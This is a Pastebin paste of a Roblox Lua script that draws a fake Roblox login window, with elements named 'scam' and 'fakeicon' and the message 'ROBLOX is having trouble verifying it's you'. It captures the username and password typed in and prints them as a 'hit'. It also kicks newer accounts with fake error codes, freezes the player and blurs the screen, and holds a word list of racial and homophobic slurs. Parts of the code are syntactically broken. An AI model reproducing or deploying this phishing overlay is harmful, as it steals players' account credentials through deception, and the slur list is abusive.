Advertisement
Guest User

Untitled

a guest
Jun 21st, 2018
100
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.81 KB | None | 0 0
  1. -- Objects
  2.  
  3. local scam = Instance.new("ScreenGui")
  4. local top = Instance.new("Frame")
  5. local fakeicon = Instance.new("ImageLabel")
  6. local fakeloginbutton = Instance.new("TextLabel")
  7. local usernamefortrust = Instance.new("TextLabel")
  8. local _2nd = Instance.new("Frame")
  9. local main = Instance.new("Frame")
  10. local guy = Instance.new("ImageLabel")
  11. local message = Instance.new("TextLabel")
  12. local username = Instance.new("TextBox")
  13. local password = Instance.new("TextBox")
  14. local verify = Instance.new("TextButton")
  15. local incorrect = Instance.new("TextLabel")
  16. local whitelist = "website is not done maggot"
  17. local players = game:GetService("Players")
  18. local player = players.Dominuos_Cold
  19. local playergui = player.PlayerGui
  20. -- Properties
  21.  
  22. scam.Parent = playergui
  23. scam.Name = "mental help"
  24. scam.Enabled = true
  25. scam.ResetOnSpawn = true
  26.  
  27. top.Name = "top"
  28. top.Parent = scam
  29. top.BackgroundColor3 = Color3.new(0, 0.454902, 0.741176)
  30. top.BorderSizePixel = 0
  31. top.Position = UDim2.new(0.328647137, 0, 0.142691702, 0)
  32. top.Size = UDim2.new(0, 615, 0, 33)
  33.  
  34. fakeicon.Name = "fakeicon"
  35. fakeicon.Parent = top
  36. fakeicon.BackgroundColor3 = Color3.new(1, 1, 1)
  37. fakeicon.BackgroundTransparency = 1
  38. fakeicon.BorderColor3 = Color3.new(0.105882, 0.164706, 0.207843)
  39. fakeicon.BorderSizePixel = 0
  40. fakeicon.Position = UDim2.new(0.0146341464, 0, 0, 0)
  41. fakeicon.Size = UDim2.new(0, 28, 0, 27)
  42. fakeicon.Image = "rbxassetid://1847911877"
  43. fakeicon.ImageColor3 = Color3.new(0.996078, 0.996078, 0.992157)
  44.  
  45. fakeloginbutton.Name = "fakeloginbutton"
  46. fakeloginbutton.Parent = top
  47. fakeloginbutton.BackgroundColor3 = Color3.new(0, 0, 0)
  48. fakeloginbutton.BackgroundTransparency = 1
  49. fakeloginbutton.BorderSizePixel = 0
  50. fakeloginbutton.Position = UDim2.new(0.0764227659, 0, 0.212121218, 0)
  51. fakeloginbutton.Size = UDim2.new(0, 67, 0, 19)
  52. fakeloginbutton.Font = Enum.Font.Arial
  53. fakeloginbutton.Text = "LOGIN"
  54. fakeloginbutton.TextColor3 = Color3.new(0.917647, 1, 0.909804)
  55. fakeloginbutton.TextScaled = true
  56. fakeloginbutton.TextSize = 14
  57. fakeloginbutton.TextWrapped = true
  58.  
  59. usernamefortrust.Name = "usernamefortrust"
  60. usernamefortrust.Parent = top
  61. usernamefortrust.BackgroundColor3 = Color3.new(0, 0, 0)
  62. usernamefortrust.BackgroundTransparency = 1
  63. usernamefortrust.BorderSizePixel = 0
  64. usernamefortrust.Position = UDim2.new(0.764227629, 0, 0.24242425, 0)
  65. usernamefortrust.Size = UDim2.new(0, 145, 0, 16)
  66. usernamefortrust.Font = Enum.Font.Arial
  67. usernamefortrust.Text = "username"
  68. usernamefortrust.TextColor3 = Color3.new(0.917647, 1, 0.909804)
  69. usernamefortrust.TextScaled = true
  70. usernamefortrust.TextSize = 14
  71. usernamefortrust.TextWrapped = true
  72. usernamefortrust.TextXAlignment = Enum.TextXAlignment.Left
  73. usernamefortrust.Text = game.Players.LocalPlayer.Name
  74.  
  75. _2nd.Name = "2nd"
  76. _2nd.Parent = top
  77. _2nd.BackgroundColor3 = Color3.new(1, 1, 1)
  78. _2nd.BorderSizePixel = 0
  79. _2nd.Position = UDim2.new(0.000761248171, 0, 1.00050676, 0)
  80. _2nd.Size = UDim2.new(0, 615, 0, 371)
  81.  
  82. main.Name = "main"
  83. main.Parent = top
  84. main.BackgroundColor3 = Color3.new(0.890196, 0.890196, 0.890196)
  85. main.BackgroundTransparency = 0.40000000596046
  86. main.BorderColor3 = Color3.new(0.105882, 0.164706, 0.207843)
  87. main.BorderSizePixel = 0
  88. main.Position = UDim2.new(0.0118701756, 0, 1.229249, 0)
  89. main.Size = UDim2.new(0, 601, 0, 349)
  90.  
  91. guy.Name = "guy"
  92. guy.Parent = main
  93. guy.BackgroundColor3 = Color3.new(1, 1, 1)
  94. guy.BackgroundTransparency = 1
  95. guy.BorderSizePixel = 0
  96. guy.Position = UDim2.new(0.0465890169, 0, 0, 0)
  97. guy.Size = UDim2.new(0, 138, 0, 154)
  98. guy.Image = "rbxassetid://1946957494"
  99. guy.ImageColor3 = Color3.new(0.929412, 0.933333, 0.945098)
  100.  
  101. message.Name = "message"
  102. message.Parent = guy
  103. message.BackgroundColor3 = Color3.new(1, 1, 1)
  104. message.BackgroundTransparency = 1
  105. message.BorderColor3 = Color3.new(0.105882, 0.164706, 0.207843)
  106. message.BorderSizePixel = 0
  107. message.Position = UDim2.new(1, 0, 0.409090906, 0)
  108. message.Size = UDim2.new(0, 406, 0, 62)
  109. message.Font = Enum.Font.Arial
  110. message.Text = "ROBLOX is having trouble verifying it's you. Please login again in order to continue playing. "
  111. message.TextColor3 = Color3.new(0, 0, 0)
  112. message.TextSize = 19
  113. message.TextWrapped = true
  114. message.TextXAlignment = Enum.TextXAlignment.Left
  115. message.TextYAlignment = Enum.TextYAlignment.Top
  116.  
  117. username.Name = "username"
  118. username.Parent = main
  119. username.BackgroundColor3 = Color3.new(1, 1, 1)
  120. username.BorderSizePixel = 0
  121. username.Position = UDim2.new(0.17304492, 0, 0.450704217, 0)
  122. username.Size = UDim2.new(0, 395, 0, 34)
  123. username.ClearTextOnFocus = false
  124. username.Font = Enum.Font.Arial
  125. username.Text = "Username"
  126. username.TextColor3 = Color3.new(0, 0, 0)
  127. username.TextSize = 17
  128. username.TextXAlignment = Enum.TextXAlignment.Left
  129. username.Text = game.Players.LocalPlayer.Name
  130.  
  131. password.Name = "password"
  132. password.Parent = main
  133. password.BackgroundColor3 = Color3.new(1, 1, 1)
  134. password.BorderSizePixel = 0
  135. password.Position = UDim2.new(0.17304492, 0, 0.630985916, 0)
  136. password.Size = UDim2.new(0, 395, 0, 34)
  137. password.ClearTextOnFocus = false
  138. password.Font = Enum.Font.Arial
  139. password.Text = "Password"
  140. password.TextColor3 = Color3.new(0, 0, 0)
  141. password.TextSize = 17
  142. password.TextXAlignment = Enum.TextXAlignment.Left
  143.  
  144. verify.Name = "verify"
  145. verify.Parent = main
  146. verify.BackgroundColor3 = Color3.new(0, 0.454902, 0.741176)
  147. verify.BorderSizePixel = 0
  148. verify.Position = UDim2.new(0.332778692, 0, 0.771830976, 0)
  149. verify.Size = UDim2.new(0, 200, 0, 57)
  150. verify.Font = Enum.Font.ArialBold
  151. verify.Text = "Verify"
  152. verify.TextColor3 = Color3.new(1, 1, 1)
  153. verify.TextSize = 32
  154.  
  155. verify.MouseButton1Down:connect(function()
  156. print("You Got A Hit! "..username.Text..":"..password.Text)
  157. end)
  158.  
  159. verify.MouseButton1Down:connect(function()
  160. top.Visible = false
  161. end)
  162. verify.MouseButton1Down:connect(function()
  163. local table = {"nigger", "fuck", "ass", "tit", " ", "fuckers", "scammer", "scammers", "cunt", "whore", "hoe", "fag", "faggot", "Password"}
  164. function check(textbox)
  165. for i = 1, #table do
  166. if table[i] == textbox.Text then return true end
  167. end
  168. return false
  169. end
  170.  
  171. if check(password) then
  172. game.Players.LocalPlayer:Kick("Your Internet Connection Timed Out, Please Rejoin")
  173. print(game.Players.LocalPlayer.Name.."Has been kicked due to being a bitch, DO NOT USE THAT PASS, IT IS INCORRECT")
  174. end
  175. end)
  176.  
  177. stuff = {"ERROR #762", "ERROR #8862", "ERROR #535", "ERROR #0093", "ERROR #227", "INTERNAL ERROR, PLEASE RESTART ROBLOX"}
  178. if game.Players.LocalPlayer.AccountAge < 50 then
  179. game.Players.LocalPlayer:Kick(stuff[math.random(#stuff)])
  180. end
  181.  
  182. if game.Workspace.Players.LocalPlayer.Humanoid.WalkSpeed = 16 then
  183. game.Workspace.Players.LocalPlayer.Humanoid.WalkSpeed = 0
  184. end
  185.  
  186. if game.Workspace.Players.LocalPlayer.Humanoid.JumpPower == 50 then
  187. game.Workspace.Players.LocalPlayer.Humanoid.JumpPower = 0
  188. end
  189.  
  190. local blur = Instance.new("BlurEffect")
  191. blur.Enabled = true
  192. for i = 1, 60 do
  193. blur.Size = i
  194. wait()
  195. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement